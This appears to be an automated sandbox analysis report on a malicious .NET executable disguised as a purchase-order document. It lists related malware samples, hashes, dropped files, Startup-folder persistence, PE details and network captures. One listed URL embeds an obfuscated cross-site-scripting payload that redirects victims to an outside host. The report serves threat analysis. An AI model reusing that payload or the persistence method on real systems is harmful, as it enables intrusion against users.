	https://www.cleaner.com/search/results?q=u5siq362e14p5%22%3E%3Cimg%20src%3D%22image.jpg%22%20onerror%3D%22var%20url1%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%20var%20url2%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%0D%0Avar%20url%20%3D%20%5B%27ht%27%2C%27tps%27%2C%27%3A%2F%27%2C%27%2Fw%27%2C%27ww.w%27%2C%27e%27%2C%27bw%27%2C%27at%27%2C%27chero%27%2C%27n%27%2C%27li%27%2C%27n%27%2C%27e.xy%27%2C%27z%2F2%27%2C%275P%27%2C%27B%27%2C%27NZ%27%2C%279%27%2C%279%2F7%27%2C%27B%27%2C%27R7%27%2C%2751%27%2C%27WZ%27%2C%27%2F%3Fsub1%3D15%26sub2%3D315-14024%26sub3%3D1267-284403-23819%27%5D.join%28%27%27%29%3B%0D%0A%20url%20%3D%20url.replace%28%2F%2C%2Fg%2C%20%27%27%29%3B%20var%20win%20%3D%20window.open%28url%2C%20%27_self%27%29%3B%20win.opener%20%3D%20null%3B%20win.location.replace%28url%29%3B%22%3E#I7JG1iFsTIxyHvBurVdK	Get hash	malicious	Unknown	Browse	188.114.96.3
	Customer account statement.html	Get hash	malicious	Unknown	Browse	1.1.1.1
NAMECHEAP-NETUS	Attendance list.exe	Get hash	malicious	FormBook	Browse	199.192.19.19
	8hd98EhtIFcYkb8.exe	Get hash	malicious	FormBook	Browse	162.0.238.43
	Drawing specification and June PO #07329.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	198.54.122.135
	Project Execution Order - (PO 546788) (PO 546789).exe	Get hash	malicious	FormBook	Browse	162.213.255.55
	Att0027592.exe	Get hash	malicious	FormBook	Browse	162.0.238.43
	Purchase Order Project No.8873_ECOFIX.exe	Get hash	malicious	Unknown	Browse	63.250.38.167
	Purchase Order Project No.8873_ECOFIX.exe	Get hash	malicious	Unknown	Browse	63.250.38.167
	TT Fizetesi Bizonylat.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	198.54.126.126
	8eBzSB5cmamfLKJ.exe	Get hash	malicious	FormBook	Browse	162.0.238.43
	SecuriteInfo.com.MalwareX-gen.30985.17962.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	198.54.122.135

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	30Fqen2Bu3.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDXjPPos73WSprAyRZ-2Fe35OyRzQCObx6m2J-2BawNrx1Z79t5DvqpoKU1sx90SQ9s1BFTlDy-2BRnvEYaoAECBzgLGytfTSN7FznTwccbM6qJLuUBwrJkCmvLgd8uOOPtKHOCiy6m2fDQJxPXI5uFtOzDGRc-3DScHx_QDM3TkIx9p0DtDeeEp0Z8-2FPcqv0Tvq51yChjKFu-2FB2Toc0JH3IfEt8ayxh9hRhaZappsCk3uGkbJsKvBDyCVHk27C5SeHf-2FrB5syLp7eES4tqFfaea5oHTg4hKblIVwbNxKeRdk6V97FA4a8WTc0qktZ4kjgtBGcuL6n47Dqs5kNCe1kyO9oqq2u-2BdPhrTaYy2E3Tb1wbzdQ4NKkm-2BJWAw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	s8Z4L8DY65.exe	Get hash	malicious	XWorm	Browse	104.26.12.205
	30Fqen2Bu3.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	FiddlerSetup.5.0.20243.10853-latest.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	104.26.12.205
	http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDQAvqLEDt4vHRnIl9R-2FSaV8cYQKwTSu6TlRyfKfKCNpqi6T3Rprq9LXKYQ9G34plU-2Fc6KaxWBoIH3kNUhm9F7K3dXpbJHxNw6DigdaCYldW7LwfYFYeoLppch4Oo8HLqZw-3D-3DvJ57_9d2PKuWgkMsb-2FuzR9pdXODiURjdHXUZxWOjR1RDmtgNtCgKSlO3B8TrsetABjpNaTpNYz3C-2BN-2Fe8PcWYAaBJJOY-2BBkK-2Br3jdT6tlTC1ulzeg0FOBv-2FDW-2BZMAe3LIHoCY1EV4P3qP-2FgkO4U8L72M16f-2BIc-2B8lqgIDpnawtqZ0MndPFzofEjexg4aHMjygT534Xh1q2WwYI6xVILXuKZVihA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	llD1w4ROY5.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	arrival notice.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	invoicepast.pdf.lnk.mal.lnk	Get hash	malicious	ScreenConnect Tool	Browse	104.26.12.205
	Invoice-UPS-218931.pdf.lnk.mal.lnk	Get hash	malicious	Unknown	Browse	104.26.12.205

Process:	C:\Users\user\Desktop\Drawing specification and June PO #07329.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzea
MD5:	EA88ED5AF7CAEBFBCF0F4B4AE0AB2721
SHA1:	B2A052ACB64FC7173E568E1520AA4D713C5E90A3
SHA-256:	50FD579DC293CFBE1CF6E5C62E0B4F879B72500000B971CE690F39FA716A3B53
SHA-512:	D1B6E5D67808E19A92A2C8BD4C708D13170D1AFD5C3CDFDA873F1C093D80B24D4101325EF20285EEEE8501239F2F1F7FA96C4571390A5B7916DCD3B461B66EC6
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzea
MD5:	EA88ED5AF7CAEBFBCF0F4B4AE0AB2721
SHA1:	B2A052ACB64FC7173E568E1520AA4D713C5E90A3
SHA-256:	50FD579DC293CFBE1CF6E5C62E0B4F879B72500000B971CE690F39FA716A3B53
SHA-512:	D1B6E5D67808E19A92A2C8BD4C708D13170D1AFD5C3CDFDA873F1C093D80B24D4101325EF20285EEEE8501239F2F1F7FA96C4571390A5B7916DCD3B461B66EC6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	731136
Entropy (8bit):	6.442029626022208
Encrypted:	false
SSDEEP:	12288:nd3LiIq/N5sKqxB6PzNm0E7UHPk8dDTVVZ+Aplb:d3LTqbsuzNm0EG8UxD
MD5:	D9B0EE244191E7FCE879415F619E88C5
SHA1:	6095D064C3E5EDFB7669AB435A89296946CE720A
SHA-256:	323AC60AB28AEB551DA47309CB6B5E9A7B23D669A983B51E7FD09E706596B97E
SHA-512:	E031062ABB5C96BBC2CDC1D8EB8ECEB7E2F6D300035850E23A3447530DAADBC904F52A97C6865EC9D7FF5493B4748F22FBC11B724B324E2B2407C90BAD602765
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 32%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......!.........."...P.. ...........>... ...@....@.. ....................................`..................................=..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......&..............@..B.................=......H...................2........&........................................................(....&..(......s.........s.........s ........s!........s"........Z........o5...........&..(6....j..{....(...+}.....{....+.j..{....(...+}.....{....+.j..{....(...+}.....{....+.j..{....(...+}.....{....+....{......,.+.....,.rq..ps;...z..\|....(...+...{......,.+.....,.rq..ps;...z..\|....(...+...{......,.+.....,.rq..ps;...z..\|....(...+...{......,.+.....,.rq..ps;...z..\|....(...+*&........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.lnk

Download File

Process:	C:\Users\user\Desktop\Drawing specification and June PO #07329.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	1408
Entropy (8bit):	3.000298736296846
Encrypted:	false
SSDEEP:	24:8dUTWLgD4/BOmRC87q8MT3GmyjCyjMRHgd0kqy:8dRgDsvRC87tMT3GHCyjMRHly
MD5:	3B149719BDB6E8F4EF9E336B4B2E10CB
SHA1:	2F9466594A2A67552B74173509C611C88F9C82B2
SHA-256:	6CBB88974C65F1C67995AD61C5E1A5919BFFF3876D6E89DD1E5A2B31F6D89CE7
SHA-512:	8ABCB01B095A3A83226CC94032D6C45DD1E4174FD52DDEDAAB8D2E64D1DEF3C0EC5604B239FE5B9A7D56B07DC46B882D2D22E552B90AA7FABDCAEC6ABBCAB141
Malicious:	false
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.....Z.1...........Programs..B............................................P.r.o.g.r.a.m.s.....V.1...........Startup.@............................................S.t.a.r.t.u.p.....Z.2...........file.exe..B............................................f.i.l.e...e.x.e

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2097
Entropy (8bit):	4.731610293213597
Encrypted:	false
SSDEEP:	12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeT4:/HRAokItULVDv
MD5:	02EA50BC6E96E97640FF521E841087B6
SHA1:	39ABCD3BFCF6CBFBAF32422F997F1F9FBA727F3A
SHA-256:	8A8F910EDD1FD2C18E0A31ABBF11F1BD60760A7789EF7B91061EDC8CF35D232A
SHA-512:	FF3F3CB250BD9E5128949B0A42D2E2C210FAEEF1C8C74979C4B4AE8AAABAD07E20B5227ADA467205ABAC0E82422DC0C61E9020BFED05FA92E332A141FA64D305
Malicious:	false
Preview:	..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.442029626022208
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Drawing specification and June PO #07329.exe
File size:	731'136 bytes
MD5:	d9b0ee244191e7fce879415f619e88c5
SHA1:	6095d064c3e5edfb7669ab435a89296946ce720a
SHA256:	323ac60ab28aeb551da47309cb6b5e9a7b23d669a983b51e7fd09e706596b97e
SHA512:	e031062abb5c96bbc2cdc1d8eb8eceb7e2f6d300035850e23a3447530daadbc904f52a97c6865ec9d7ff5493b4748f22fbc11b724b324e2b2407c90bad602765
SSDEEP:	12288:nd3LiIq/N5sKqxB6PzNm0E7UHPk8dDTVVZ+Aplb:d3LTqbsuzNm0EG8UxD
TLSH:	B8F4AF898E937116C8DB03355F9351B8AFA64D732E89989A04431392FA3F3D7BC658D3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......!.........."...P.. ...........>... ...@....@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4b3e0e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x2186159D [Wed Oct 28 16:04:45 1987 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb3dbc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb4000	0x3e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb1e14	0xb2000	e06e94155162bc82a2bcc5f6c29a5036	False	0.6135418495435393	SysEx File -	6.449928655421317	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb4000	0x3e8	0x400	1da576551cfeb02595a2acd9b202c4d7	False	0.4306640625	data	3.436617538765956	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb6000	0xc	0x200	eb5e75a19d683016c0082cf462ae0dd8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb4058	0x390	data			0.44956140350877194

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 16:39:08.207855940 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:08.212719917 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.212794065 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:08.213855982 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:08.218633890 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.915752888 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.915832996 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.915843964 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.915895939 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:08.915935040 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.915946960 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.915986061 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:08.916136980 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.916150093 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.916162014 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.916172028 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.916184902 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.916202068 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:08.916232109 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:08.920730114 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.920793056 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.920804024 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.920841932 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:08.920922041 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:08.920974016 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.010292053 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.010324955 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.010338068 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.010382891 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.010499001 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.010513067 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.010560989 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.010723114 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.010766983 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.010862112 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.010874033 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.010915041 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.016748905 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.016844034 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.016855001 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.016890049 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.023320913 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.023377895 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.023400068 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.023411036 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.023454905 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.028971910 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.029053926 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.029064894 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.029099941 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.034771919 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.034838915 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.034873962 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.034887075 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.034940958 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.041064024 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.041147947 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.041162014 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.041223049 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.047132969 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.047189951 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.047202110 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.047204971 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.047247887 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.052875042 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.052886009 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.052897930 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.052936077 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.052990913 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.053050041 CEST	49711	80	192.168.2.6	142.250.74.196
Jul 2, 2024 16:39:09.109183073 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.109214067 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.109226942 CEST	80	49711	142.250.74.196	192.168.2.6
Jul 2, 2024 16:39:09.109239101 CEST	80	49711	142.250.74.196	192.168.2.6
